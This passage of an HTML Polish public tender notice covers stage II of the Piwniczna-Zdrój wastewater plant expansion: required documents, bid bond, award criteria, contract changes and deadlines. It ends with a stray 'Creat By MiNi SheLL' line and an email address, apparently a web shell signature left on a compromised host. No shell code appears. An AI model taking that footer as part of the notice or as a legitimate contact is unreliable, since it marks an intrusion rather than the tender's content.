C.1) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania  ofert  albo  wniosków  o dopuszczenie  do  udziału  w postępowaniu,  a jeżeli  okres  prowadzenia  działalności  jest krótszy  w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których  mowa, są referencje bądź inne dokumenty  wystawione przez  podmiot,  na  rzecz  którego  roboty  budowlane  były  wykonywane,  a jeżeli  z uzasadnionej  przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty potwierdzające spełnienie warunków udziału w postępowaniu  na potwier-dzenie spełniania warunku opisanego w Dz.V pkt. 2 ppkt. a
C.2) wykaz  osób,  skierowanych  przez  wykonawcę  do  realizacji  zamówienia  publicznego,  w szczególności  odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z infor-macjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją                   o podstawie do dysponowania tymi osobami na potwierdzenie spełniania warunku opisanego w Dz.V pkt. 2 ppkt. c

   D. W celu wykazania spełnienia przez wykonawcę warunków  w zakresie sytuacji ekonomicznej lub finansowej o należy złożyć następujące dokumenty: 
D.1.) Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiada-nych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 1 miesiąc przed upływem terminu składania ofert  - na potwierdzenie spełnienia warunku wskazanego w Dz. V ppkt 3.
D.2) dokument/y potwierdzający/e, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - na potwierdzenie spełnienia warunku wska-zanego w Dz. V ppkt 3
Jeżeli z uzasadnionej przyczyny  wykonawca  nie  może złożyć  wymaganych przez zamawiającego dokumentów, o których  mowa   w pkt. D,1 i D.2  zamawiający  dopuszcza  złożenie  przez  wykonawcę  innych  dokumentów,  o których  mowa w art. 26 ust. 2c  ustawy Prawo zamówień publicznych, 
E. Postanowienia dotyczące składania dokumentów przez Wykonawców mających siedzibę lub miejsce za-mieszkania poza terytorium Rzeczypospolitej Polskiej: 
E.1) Wykonawca, który ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa ;
1)   w  pkt  B.1), składa dokument lub dokumenty, wystawione  w kraju, w którym ma siedzibę lub miejsce za-mieszkania, potwierdzające odpowiednio, że:
 nie otwarto jego likwidacji ani nie ogłoszono upadłości  wystawiony nie wcześniej niż 6 miesięcy przed upły-wem terminu składania ofert;


E.2) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa E. 1, zastępuje się je dokumentem zawierającym odpo-wiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem  samorządu zawodowego lub gospodarczego  właściwym ze  względu na siedzibę lub  miejsce  zamieszkania wykonawcy lub miejsce zamieszkania tej osoby  wystawionych nie wcześniej niż w terminach określonych w pkt. E.1 
E.3) W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę, zamawiający może zwrócić się do właściwych organów kraju, w którym miejsce zamieszkania ma osoba, której dokument dotyczy, o udzie-lenie niezbędnych informacji dotyczących tego dokumentu.
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">nie dotyczy</div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Wykonawcy winni przedłożyć z ofertą  następujące dokumenty: 

1. Formularz ofertowy - wypełniony i podpisany przez wykonawcę - Załącznik nr 1 do SIWZ
2. Oświadczenie o spełnieniu warunków udziału i nie podleganiu wykluczeniu z postępowania  zwane dalej-  oświadczeniem -  stanowiące wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu załącznik nr 2
a) w oświadczeniach należy wypełnić jedynie te działy i sekcje, które dotyczą warunków udziału i potwierdzają-cych brak podstaw do wykluczenia na podstawie treści ogłoszenia o zamówieniu i niniejszej specyfikacji. Wy-pełnienie pozostałych, nie wymaganych Działów i sekcji nie będzie miało wpływu na ocenę oferty.
3. oświadczenie Wykonawcy, które z informacji zawartych w ofercie na stronach od .... do .... stanowią tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy o zwalczaniu nieuczciwej konkurencji i jako takie nie mogą być udostępniane innym uczestnikom postępowania. W przypadku zastrzeżenia informacji przez  wykonawcę zobowiązany jest on wykazać, że zastrzeżone informacje stanowią tajemnicę przedsiębiorstwa. Brak powyższego oświadczenia oznaczał będzie, że dokumenty składające się na ofertę nie stanowią tajemnicy przedsiębiorstwa (Wykonawca nie może zastrzec informacji, o których mowa w art. 86 ust. 4 ustawy ). 
4.pełnomocnictwo ( jeżeli dotyczy).
5.zobowiązanie innych podmiotów do oddania wykonawcy do dyspozycji zasobów na potrzeby realizacji zamó-wienia (art.22a ust.2 ustawy Prawo zamówień Publicznych)  jeżeli dotyczy - dołączamy do oferty
6.Inne dokumenty zgodnie z SIWZ
7. W terminie 3 dni od  dnia zamieszenia na stronie internetowej zamawiającego informacji, o której mowa  w art.86 ust.5 przekazuje Zamawiającemu oświadczenie o przynależności lub braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r  o ochronie konkurencji i konsumentów (Dz.U. z 2015r poz. 184,z póż.zm.). Wraz ze złożeniem oświadczenia, wykonawca może przedstawić dowody potwier-dzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. Powyższe należy złożyć wg. Wzoru stanowiącego załącznik nr 3 do SIWZ
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Zamawiający wymaga wniesienia wadium; 
2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: kwota wadium: 70 000,00zł ( słownie;  siedemdziesiąt  tysięcy  złotych   00/100)
3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:
 1) w pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy w Piwnicznej-Zdroju, BS Piwniczna, nr: 62 8813 0004 2001 0000 7100 0001, z adnotacją wadium  Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II realizowana   w ramach projektu  pn. Poprawa gospodarki wodno-ściekowej na terenie Miasta                    i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16

 2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym;
 3) w gwarancjach bankowych;
 4) w gwarancjach ubezpieczeniowych;
 5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r.  poz. 1804 oraz z 2015r. poz.978 i 1240)  w terminie do 21.02.2017r. Sposób przekazania: oryginał dołączony do oferty; 
4. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym; 
5. Wadium wniesione w pieniądzu należy wnieść przed upływem terminu składania ofert, przy czym za termin wniesienia wadium w formie pieniężnej przyjmuje się termin uznania na rachunku bankowym Zamawiającego;
 6. Wadium wniesione w pieniądzu, zostanie zwrócone wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę;
 7. Wadium wniesione w formie innej niż pieniądz należy złożyć w formie oryginału, razem z ofertą w osobnej kopercie;
 8. Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winno zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specy-fikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela;
 9. W przypadku niezabezpieczenia oferty jedną z określonych w niniejszej specyfikacji form wadium, Wyko-nawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu; 
10. Zamawiający zwróci wadium wszystkim Wykonawcom niezwłocznie po wyborze  najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza;
 11. Wykonawcy, którego oferta zostanie wybrana jako najkorzystniejsza, Zamawiający zwróci wadium nie-zwłocznie po zawarciu umowy;
 12. Zamawiający zwróci niezwłocznie wadium na wniosek Wykonawcy, który wycofał ofertę przed upływem terminu składania ofert;
 13. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Prawo Zamówień Publicznych, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, potwierdzających okoliczności o których mowa w art. 25 ust. 1 ustawy Prawo Zamówień Publicznych , oświadczenia , o którym mowa w art. 25a ust.1, pełnomocnictw, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
14. W zakresie wadium obowiązują uregulowania zawarte w art. 45 i 46 ustawy Prawo Zamówień Publicznych.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Okres rękojmi</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />
1.	Wszelkie zmiany i uzupełnienia treści umowy winny zostać dokonane wyłącznie w formie aneksu podpisanego przez obie strony, pod rygorem nieważności, zgodnie z art. 144 Prawo Zamówień Publicznych.
2.	W związku z brzmieniem art. 144 ustawy, Zamawiający przewiduje następujące możliwości dokonania  zmiany niniejszej umowy:
1)	w zakresie przedmiotu zamówienia,  w razie zaistnienia okoliczności, których nie dało się  przewidzieć w chwili podpisania umowy, a w szczególności w sytuacji pojawienia się na rynku nowych rozwiązań technologicznych i materiałowych,
2)	w zakresie terminu realizacji umowy (wykonania robót), zwłaszcza gdy dotrzymanie terminu wskazanego pierwotnie okazało się niemożliwe z powodów, za które nie ponosi odpowiedzialności Wykonawca, w tym jeżeli pojawiły się okoliczności. których nie można było przewidzieć    w chwili zawierania umowy, zwłaszcza w przypadku wystąpienia potrzeby realizacji robót dodatkowych,
3)	w przypadku wystąpienia nagłych, nieprzewidzianych warunków atmosferycznych, geologicznych, archeologicznych, w szczególności:
a)	klęski żywiołowe;
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów, w szczególności: temperatury powietrza poniżej -20C, wiatr uniemożliwiający pracę maszyn budowlanych, gwałtowne opady deszczu (oberwanie chmury), gradobicie, burze z wyładowaniami atmosferycznymi,
c)	niewypały i niewybuchy;
d)	wykopaliska archeologiczne;
e)	odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego wa-runki geologiczne (kategorie gruntu, kurzawka, głazy narzutowe itp.);
f)	odmienne od przyjętych w dokumentacji przedstawionej przez Zamawiającego wa-runki terenowe, w szczególności istnienie podziemnych sieci, instalacji, urządzeń lub nie zinwentaryzowanych obiektów budowlanych (bunkry, fundamenty, ściany szczelne itp.)
4)	przypadku wystąpienia innych przyczyn zewnętrznych niezależnych od Zamawiającego oraz Wykonawcy, skutkujących niemożliwością prowadzenia prac w szczególności:
a)	brak możliwości dojazdu oraz transportu materiałów na Teren Budowy spowodowa-ny awariami, remontami lub przebudowami dróg dojazdowych;
b)	protesty mieszkańców;
c)	przerwa w dostawie energii elektrycznej, wody;
d)	działania osób trzecich uniemożliwiające wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,
5)	w następstwie wystąpienia okoliczności leżących po stronie Zamawiającego, w szczególności:
a)	nieterminowe przekazanie terenu budowy przez Zamawiającego;
b)	wstrzymanie robót przez Zamawiającego;
c)	niewykonanie przez Zamawiającego robót budowlanych lub dostaw, bez realizacji których Wykonawca nie może w sposób należyty wykonywać przedmiotu umowy, z przekroczeniem terminów wskazanych przez Zamawiającego dla wykonania tych ro-bót lub dostaw; 
d)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji umowy.
6)	w zakresie zmniejszenia wynagrodzenia, zwłaszcza w sytuacji zmniejszenia zakresu robót,
7)	w zakresie zmniejszenia lub zwiększenia wynagrodzenia w zawiązku ze zmianą stawki podatku VAT w zakresie przedmiotu zamówienia.
3.	Zmiana terminu wykonania przedmiotu umowy z przyczyn, o których mowa w niniejszym para-grafie, może nastąpić tylko i wyłącznie o okres niezbędny do wykonania przedmiotu umowy w sposób należyty, nie dłużej jednak niż o okres uwzględniający faktyczną niemożność wykonania przedmiotu umowy.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 21/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                do: 22/03/2017<br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Rozbudowa oczyszczalni ścieków Piwniczna -Zdrój - etap II
realizowana   w ramach projektu pn. Poprawa gospodarki wodno-ściekowej na terenie Miasta   i Gminy Piwniczna-Zdrój" nr POIS.02.03.00-00-039/16
Wykluczenie wykonawcy następuje w sytuacjach określonych w pkt.III.2) ogłoszenia z uwzględnieniem ar.24 ust.7 ustawy Prawo zamówień publicznych
</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com